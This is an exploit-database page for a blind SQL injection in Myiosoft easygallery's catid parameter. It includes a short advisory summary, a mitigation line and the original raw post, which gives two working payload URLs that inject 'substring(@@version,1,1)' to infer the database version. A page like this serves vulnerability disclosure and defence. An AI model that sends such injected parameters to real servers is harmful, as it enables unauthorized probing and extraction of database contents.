header-logo
Suggest Exploit
vendor:
easygallery
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: easygallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Myiosoft easygallery (catid) Blind SQL Injection Vulnerability

A blind SQL injection vulnerability exists in Myiosoft easygallery. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The attacker can use the substring() function to determine the version of the database server. For example, an attacker can send a request with the substring() function to determine if the version of the database server is 4 or 5. If the request returns true, then the version of the database server is 5.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Myiosoft easygallery (catid)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com<http://www.IQ-TY.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________


script  : http://myiosoft.com/?1.105.0.0

Exploit :
_______
true & false

http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4  > false

http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5  > true




end
  IQ-SecuritY FoRuM